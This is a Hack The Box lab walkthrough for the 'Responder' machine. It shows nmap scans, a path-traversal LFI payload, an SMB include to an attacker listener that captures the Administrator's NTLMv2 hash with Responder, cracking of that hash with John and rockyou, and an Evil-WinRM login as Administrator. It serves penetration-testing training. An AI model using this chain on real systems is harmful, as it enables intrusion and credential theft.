---
sidebar_position: 4
sidebar_label: 🚒 Responder
description: This is the last Tier 1 Machine of the Starting Point. In this case we will be using Responder to get the administrator's hash and then using jhon the ripper we will try to get his password.
last_update:
  date: 2022/06/11
  author: Raúl Sánchez
tags:
  - LFI
  - SMB
  - Responder
  - NT LAN Manager
  - Jhon the ripper
  - WinRM
  - Evil-WinRM
keywords: 
  - Hack The Box
  - HTB
  - HTB Writeups
  - Hacking
  - HTB Walkthrough
  - Write-up
  - Walkthrough
---

# Responder

> This is the last Tier 1 Machine of the Starting Point. In this case we will be using Responder to get the administrator's hash and then using jhon the ripper we will try to get his password.

## 0. Start the machine

To start machine, Just click "Spawn Machine".

![](responder1.png)

Then you can see the **IP** address for that machine. In this case the machine has the IP `10.129.182.122`. Before going to enumeration steps we can simply ping to the IP address and check our **VPN** connection and whether machine is alive. Sometimes machines might "Disable" ping requests from passing through the firewall. But in most case ping will be a success!

```python
❯ ping -c1 10.129.182.122
PING 10.129.182.122 (10.129.182.122) 56(84) bytes of data.
64 bytes from 10.129.182.122: icmp_seq=1 ttl=127 time=366 ms

--- 10.129.182.122 ping statistics ---
1 packets transmitted, 1 received, 0% packet loss, time 0ms
rtt min/avg/max/mdev = 366.170/366.170/366.170/0.000 ms
```

:::caution Disclaimer
No flags (user/root) are shown in this **writeup**, so follow the procedures to grab the flags! Enjoy! 👽️
:::

## 1. Enumeration

The first thing to do is to identify which operating system you are using. We will use the [whichSystem.py](https://github.com/RaulSanchezzt/kali-bspmw/blob/master/tools/whichSystem.py) tool to find out.

```python
❯ whichSystem.py 10.129.182.122

10.129.182.122 (ttl -> 127): Windows
```

:::info
By default Linux has a TTL of 64 and Windows has 128.
:::

Then, we will use the [nmap](https://nmap.org/) tool with the following parameters:

* [-sV](https://nmap.org/book/man-version-detection.html) : to see the services and their version.
* \-p- : to scan every TCP port \[0-65535].
* [--min-rate 5000](https://nmap.org/book/man-performance.html) : send packets as fast as or faster than the given rate.

```python
❯ nmap -sV -p- --min-rate 5000 10.129.182.122
Starting Nmap 7.92 ( https://nmap.org ) at 2022-06-11 16:56 CEST
Nmap scan report for 10.129.182.122
Host is up (0.19s latency).
Not shown: 65533 filtered tcp ports (no-response)
PORT     STATE SERVICE VERSION
80/tcp   open  http    Apache httpd 2.4.52 ((Win64) OpenSSL/1.1.1m PHP/8.1.1)
5985/tcp open  http    Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 82.06 seconds
```

As we see, the machine is using Windows as its operating system and two ports were detected, [Apache](https://apache.org) web server running on port 80/tcp along with [WinRM](https://docs.microsoft.com/en-us/windows/win32/winrm/portal) on port 5985/tcp .

:::note
**WinRM** is Microsoft's implementation of WS-Management in Windows which allows systems to access or exchange management information across a common network.
:::

## 2. Foothold

If we put the target IP on the browser, it returns a message about being unable to find that site. Looking in the URL bar, it now shows `http://unika.htb`.&#x20;

![Error, the browser can't find the address.](responder2.png)

To solve it, add an entry in the `/etc/hosts` file for this domain.

```python
❯ cat /etc/hosts
127.0.0.1       localhost
127.0.1.1       kali
10.129.182.122  unika.htb

# The following lines are desirable for IPv6 capable hosts
::1     localhost ip6-localhost ip6-loopback
ff02::1 ip6-allnodes
ff02::2 ip6-allrouters
```

Now, we will can access the web `unika.htb`. We notice a language selection option on the navbar `EN` and changing the option to `FR` takes us to a `French` version of the website.

![unika.htb website.](responder3.png)

### 2.1 Local File Inclusion

We can see that the `french.html` page is being loaded by the page parameter, which may potentially be vulnerable to a Local File Inclusion ([LFI](https://en.wikipedia.org/wiki/File\_inclusion\_vulnerability)) vulnerability if the page input is not sanitized.

![french.html parameter.](responder4.png)

:::note
A **file inclusion vulnerability** is a type of vulnerability that is most commonly found to affect web applications that rely on a scripting run time. This issue is caused when an application builds a path to executable code using an attacker-controlled variable in a way that allows the attacker to control which file is executed at run time.
:::

Then, we will try some typical paths and we will found that this path works.

```batch
http://unika.htb/index.php?page=../../../../../../../../windows/system32/drivers/etc/hosts
```

![Local file inclusion.](responder5.png)

### 2.2. Responder

Now we know that this machine is vulnerable to LFI and it's running on Windows. So there exists a potential for including a file on our attacker workstation. If we want to use a protocol like SMB, Windows will try to authenticate to our machine, and we can capture the [NetNTLMv2](https://en.wikipedia.org/wiki/NT\_LAN\_Manager).

:::tip
**NT LAN Manager** is a suite of Microsoft security protocols intended to provide authentication, integrity, and confidentiality to users.
:::

We can attempt to load a SMB URL, and in that process, we can capture the hashes from the target using [Responder](https://github.com/SpiderLabs/Responder). To start with,  we clone the Responder repository to our local machine.

```bash
git clone https://github.com/lgandx/Responder
```

Proceed to start Responder with python3 , passing in the interface to listen on using the -I flag.

```shell
❯ sudo python3 Responder.py -I tun0
[sudo] contraseña para raul: 
                                         __
  .----.-----.-----.-----.-----.-----.--|  |.-----.----.
  |   _|  -__|__ --|  _  |  _  |     |  _  ||  -__|   _|
  |__| |_____|_____|   __|_____|__|__|_____||_____|__|
                   |__|

           NBT-NS, LLMNR & MDNS Responder 3.1.1.0

  Author: Laurent Gaffie (laurent.gaffie@gmail.com)
  To kill this script hit CTRL-C


[+] Poisoners:
    LLMNR                      [ON]
    NBT-NS                     [ON]
    MDNS                       [ON]
    DNS                        [ON]
    DHCP                       [OFF]

[+] Servers:
    HTTP server                [ON]
    HTTPS server               [ON]
    WPAD proxy                 [OFF]
    Auth proxy                 [OFF]
    SMB server                 [ON]
    Kerberos server            [ON]
    SQL server                 [ON]
    FTP server                 [ON]
    IMAP server                [ON]
    POP3 server                [ON]
    SMTP server                [ON]
    DNS server                 [ON]
    LDAP server                [ON]
    RDP server                 [ON]
    DCE-RPC server             [ON]
    WinRM server               [ON]
```

With the Responder server ready, we tell the server to include a resource from our **SMB** server by setting the page parameter as follows via the web browser.

```python
http://unika.htb/?page=//[TUN0_IP_ADDRESS]/somefile
```

![Error about not being able to load the requested file.](responder6.png)

Then, we will see that our listening Responder server we have a **NetNTLMv** for the Administrator user.

```python
[+] Listening for events...

[SMB] NTLMv2-SSP Client   : 10.129.182.122
[SMB] NTLMv2-SSP Username : RESPONDER\Administrator
[SMB] NTLMv2-SSP Hash     : Administrator::RESPONDER:21fe5a2826b5bf42:E1EA1845B8E72B6F9163B3DC24275BB1:0101000000000000003DA976CD7DD801C2BAE893AFEF5DDB0000000002000800370033004A00460001001E00570049004E002D004C0031004F005500510051005900540033003000580004003400570049004E002D004C0031004F00550051005100590054003300300058002E00370033004A0046002E004C004F00430041004C0003001400370033004A0046002E004C004F00430041004C0005001400370033004A0046002E004C004F00430041004C0007000800003DA976CD7DD80106000400020000000800300030000000000000000100000000200000B9ED06F80D387DBD1B48A237FF2DA4774481AFE1120F12F2B9E2893829468C3A0A001000000000000000000000000000000000000900220063006900660073002F00310030002E00310030002E00310035002E003100300035000000000000000000
```

Save the hash to a new file named **hash.txt**.

```bash
❯ echo Administrator::RESPONDER:21fe5a2826b5bf42:E1EA1845B8E72B6F9163B3DC24275BB1:0101000000000000003DA976CD7DD801C2BAE893AFEF5DDB0000000002000800370033004A00460001001E00570049004E002D004C0031004F005500510051005900540033003000580004003400570049004E002D004C0031004F00550051005100590054003300300058002E00370033004A0046002E004C004F00430041004C0003001400370033004A0046002E004C004F00430041004C0005001400370033004A0046002E004C004F00430041004C0007000800003DA976CD7DD80106000400020000000800300030000000000000000100000000200000B9ED06F80D387DBD1B48A237FF2DA4774481AFE1120F12F2B9E2893829468C3A0A001000000000000000000000000000000000000900220063006900660073002F00310030002E00310030002E00310035002E003100300035000000000000000000 > hash.txt
```

### 2.3 Jhon the ripper

First of all, check that you have a the wordlist uncompressed.

```bash
❯ sudo gzip -d /usr/share/wordlists/rockyou.txt.gz
```

Then, pass the hash file to [john](https://www.openwall.com/john/) and crack the password for the Administrator account using -w to indicate the wordlist.

```python
❯ john -w=/usr/share/wordlists/rockyou.txt hash.txt
Using default input encoding: UTF-8
Loaded 1 password hash (netntlmv2, NTLMv2 C/R [MD4 HMAC-MD5 32/64])
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
badminton        (Administrator)     
1g 0:00:00:00 DONE (2022-06-11 21:05) 33.33g/s 136533p/s 136533c/s 136533C/s slimshady..oooooo
Use the "--show --format=netntlmv2" options to display all of the cracked passwords reliably
Session completed. 
```

We will see that the password of the user `administrator` is `badminton`.

### 2.4 WinRM

Finally, we will use [Evil-WinRM](https://github.com/Hackplayers/evil-winrm) connect to the WinRM service on the target with the administrator's credentials.

```python
❯ evil-winrm -i 10.129.182.122 -u administrator -p badminton

Evil-WinRM shell v3.3

Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine

Data: For more information, check Evil-WinRM Github: https://github.com/Hackplayers/evil-winrm#Remote-path-completion

Info: Establishing connection to remote endpoint
```

We will find the flag under `C:\Users\mike\Desktop\flag.txt`.

```visual-basic
*Evil-WinRM* PS C:\Users\Administrator\Documents> cd C:\Users\mike\desktop
*Evil-WinRM* PS C:\Users\mike\desktop> dir


    Directory: C:\Users\mike\desktop


Mode                 LastWriteTime         Length Name
----                 -------------         ------ ----
-a----         3/10/2022   4:50 AM             32 flag.txt


*Evil-WinRM* PS C:\Users\mike\desktop> type flag.txt
```

Use the `type` command to view the contents of the `flag.txt`.
